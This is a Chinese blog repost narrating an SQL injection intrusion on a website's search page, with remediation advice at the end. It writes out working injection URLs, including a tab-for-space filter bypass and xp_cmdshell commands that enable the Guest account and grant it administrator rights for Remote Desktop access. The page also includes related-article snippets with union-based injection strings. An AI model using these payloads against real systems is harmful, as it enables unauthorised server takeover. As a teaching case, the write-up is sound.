典型的 SQL 注入过程

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量130 收藏
点赞数
分类专栏: J2EE 文章标签: SQL 应用服务器 XP .net 脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/babala_234/article/details/83523139
版权

此漏洞已帮其修复,并知会当事人

SQL 注入漏洞危害巨大,但 SQL 注入也经常的被发现,少不小心过滤不完全就有可能让整个应用陷入困境。

无意间发现某站点存在 SQL 注入漏洞,于是利用这个漏洞提权并获取服务器控制权。这个案例很典型,像是教科书式的典型入侵步骤,下面就以这个案例展示从 SQL 注入到获取目标服务器控制权限的全过程。

发现

http://files.gracecode.com/2009_11_11/1257999312.gif

访问某站点的搜索页面,发现输入单引号“'”就直接报错,这就说明这个页面存在 注入的可能。为了证实这点,首先闭合请求访问语句,然后对比返回结果的差异。

发现访问

http://foo/rss.aspx?keyword=lucky

以及

http://foo/rss.aspx?keyword=lucky'));--

都可以被执行,但是返回的结果不同。根据下面的错误信息,是注释掉了 ORDER BY 。

分析

根据上面的情况,能非常肯定的断定这个脚本存在很严重的 SQL 注入漏洞。下一步,尝试构建插入 SQL 语句

http://files.gracecode.com/2009_11_11/1257999379.gif

http://foo/rss.aspx?keyword=lucky'));SELECT%20SERVERPROPERTY%20('edition');--

发现服务器的报错信息为 SQL 语句语法错误,SQL 构建不成功。几次尝试注入均不成功,于是休息下先把重点放到服务器本身

http://files.gracecode.com/2009_11_11/1257999485.png

扫描目标主机开放的端口,发现目标主机的 3389 端口是开放的。用远程桌面访问这个端口,可以访问。万事俱备,看来思路还得回到如何利用这个 SQL 注入漏洞。

此时灵光一现,是不是服务器的脚本分割用户输入的空格(%20),然后组成 SQL 语句查询?那么将空格转换成 TAB(%09)试试看,重新发起请求

http://foo/rss.aspx?keyword=lucky'));SELECT%09SERVERPROPERTY%09('edition');--

http://files.gracecode.com/2009_11_11/1257999508.png

并没有报错,说明判断是正确的。接下来的事情就好办了,调用 SQL 外部命令将 Guest 用户解禁并加入管理组。

提权

解禁 Guest 用户

http://foo/rss.aspx?keyword=lucky'));exec%09Master..xp_CMDShell%09'net%09user%09guest%09/active:yes';--

相当于服务器执行

net user guest /active:yes

再将 Guest 加入到管理员组

http://foo/rss.aspx?keyword=lucky'));exec%09Master.xp_CMDShell%09'net%09localgroup%09administrators%09guest%09/add';--

相当于服务器执行

net localgroup administrators guest /add

http://files.gracecode.com/2009_11_11/1257999460.gif

上述请求顺利执行成功,然后打开目标主机的远程登录,输入用户名“guest”密码为空登录,结果顺利登录 (运气和相貌都很重要 :P)。

重新关上 Guest 帐户,并通知主机管理员,至此攻击结束。

后记

正如上文所描述的,SQL 漏洞危害非常的巨大,但我相信国内很多中小站点还普遍存在着这样的漏洞。这里有些个人的不完全建议

  • 代码要对输入的参数做到充分的过滤,并尽可能得考虑极端情况
  • 错误信息尽可能的少,否则无关的人看不懂而有心的人就会提起兴趣
  • 不要以管理员的身份运行服务器进程
  • 某些情况下,net 命令对于攻击者而言就是“微软牌”的木马
  • 严格控制远程登录访问者的来源
  • 如果可能的情况下,不是很推荐使用 Windows 作为服务器操作系统

-- EOF --

夜梦星辰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入过程详解_动力节点Java学院整理
09-09
以下是一个典型SQL注入过程: 1. **发现SQL注入位置**:寻找含有用户输入数据的URL参数,比如`http://xxx.xxx.xxx/abc.jsp?id=XX`。如果参数直接影响到SQL查询,可能存在注入风险。 2. **判断后台数据库类型**:...
sql注入详细过程
qq_42890862的博客
06-30 5894
mysql mysql5.0以上版本包含内置的information_schema数据库,它储存着mysql所有的数据库和表结构信息,利用该数据库可以查询到所有的数据库和表的内容 5.0 暴力破解的方式获取数据 1.原理 当我们的Web app在向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2.sql手工注入的基本思路 (1)找到注入点 在我们可控的输入部分加一些符号,查看页
SQL注入的一般过程
lifanxin的博客
05-07 1万+
SQL注入的一般过程概述SQL注入一道例题总结 概述   SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。SQL注入大致可以分为两类:数字型注入和字符型注入SQL注入   这里介绍下SQL注入的基本流程,需要明确的是在实际注入中,我们都是无法看到具体的后端代码的,也就是无法知晓具体的SQL拼接
sql注入详解
m0_67392811的博客
06-12 5846
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
【万字长文】SQL注入全流程解析,零基础看这一篇就够了
m0_74131821的博客
03-22 2175
SQL注入简单来说就是前端没有对输入的数据进行过滤,同时后端也没有过滤,导致一些不合法的SQL语句可以执行,导致SQL注入
细说——SQL注入的常见方式
LainWith的博客
11-04 7198
目录BurpSuite预配置1. 安装CO22. 配置CO23. 小试牛刀使用pikachu靶场的“字符型注入”联合查询(union)函数介绍order byunion selectlimit操作报错盲注1. 获取数据库名2. 获取敏感信息3.获取 mysql 账号密码其他报错函数4. 获取表名4.1 获取第一张表4.2 获取第二张表4.3 获取所有表5. 获取列5.1 获取第一列5.2 获取第二列5.3 获取所有列6. 获取列中的数据6.1 获取第一组数据6.2 获取第二组数据6.3 获取所有数据布尔盲注
SQL注入漏洞过程实例及解决方案
09-08
这就是典型SQL注入攻击。 为了解决这个问题,我们可以采用预编译的`PreparedStatement`对象,它能有效防止SQL注入。`PreparedStatement`会将用户输入的数据与SQL语句分离,确保即使输入包含特殊字符,也不会被...
sql注入_表名、列名字典
05-06
在描述中,“union select * from 表名字典 union select 列名字典 from 表名”是一个典型SQL注入攻击语句。这个语句利用了`UNION`操作符来合并两个或更多`SELECT`语句的结果集。通常,攻击者会尝试不同的表名和...
Oracle开发人员SQL注入攻击入门
10-11
- **缓冲区溢出**:虽然不是典型SQL注入,但攻击者可能会利用数据库或应用程序中的缓冲区溢出漏洞,以执行任意代码。 5、防范措施 - **参数化查询/预编译语句**:使用绑定变量可以防止SQL注入,因为它们将用户...
sql各种注入案例
m0_69435261的博客
09-01 4921
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集)GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。GTID_SUBSET函数。
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
SQL注入类型与技巧
求大佬师傅带
09-01 4216
SQL注入类型与技巧
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 5717
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
从0到1详解sql注入
2301_77004573的博客
08-17 280
' order by 1,2--+ #若不报错,说明了列数为2' union select 1,group_concat(schema_name) from information_schema.schemata+--+ #爆库名' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()+--+ #爆表名。
SQL注入漏洞详解总结大全
m0_64583632的博客
01-20 3427
SQL注入利用手法详解大全
sql注入入门学习
weixin_53146913的博客
07-20 453
MySQl注入的一般流程
SQL注入漏洞
来日可期的博客
08-24 2169
SQL注入SQL Injectian)是一种常见的Web安全漏洞。攻击者利用这个漏洞,可以增删改查数据库中数据,或者利用潜在的数据库漏洞进行攻击。
sql注入手法详解
m0_71299382的博客
11-26 1万+
sql注入总结
sql 系统 存储过程的使用方法 转载
weixin_33800593的博客
08-06 170
声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。考虑再三,偶还是决定发出来。此招手段歹毒,利用范围广泛,可以说是只要是有sql注射漏洞的网站,只要运用此法99%可以拿到webshell甚至系统权限(不敢把话说满,呵呵,经本人数百次真实“实战演习”,基本上...
SQL注入深度解析与防护策略
例如,以下代码展示了SQL注入典型场景: ```javascript id=request.QueryString("id"); set rs=server.createobject("adodb.recordset"); sql="select * from admin where id=" & id; ``` 这段代码中的"id"变量...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值